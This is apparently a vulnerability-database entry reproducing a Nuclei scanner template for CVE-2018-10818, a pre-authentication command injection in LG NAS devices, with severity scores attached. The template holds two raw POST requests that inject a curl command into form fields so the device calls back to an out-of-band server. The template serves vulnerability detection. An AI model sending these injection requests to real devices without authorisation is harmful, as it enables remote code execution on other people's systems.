Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-10818
HistoryJul 26, 2021 - 5:27 p.m.

LG NAS Devices - Remote Code Execution

2021-07-2617:27:13
ProjectDiscovery
github.com
80
cve
2018
lg nas
remote code execution
out-of-band
injection

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.9

Confidence

High

EPSS

0.939

Percentile

99.2%

LG NAS devices contain a pre-auth remote command injection via the “password” parameter.

id: CVE-2018-10818

info:
  name: LG NAS Devices - Remote Code Execution
  author: gy741
  severity: critical
  description: LG NAS devices contain a pre-auth remote command injection via the "password" parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.
  remediation: |
    Apply the latest firmware update provided by LG to mitigate this vulnerability.
  reference:
    - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
    - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10818
  classification:
    cve-id: CVE-2018-10818
  metadata:
    max-request: 2
  tags: cve,cve2018,lg-nas,rce,oast,injection
variables:
  useragent: '{{rand_base(6)}}'

http:
  - raw:
      - |
        POST /system/sharedir.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        &uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'
      - |
        POST /en/php/usb_sync.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        &act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: {{useragent}}"
# digest: 4a0a0047304502202b56677fec54d514978c64631558171a8f9588ca78711315dd08583d0ed373340221009dff21f2f19a0772452e60725b3701999ff6c59a8bdb380e982af97876bcb175:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.9

Confidence

High

EPSS

0.939

Percentile

99.2%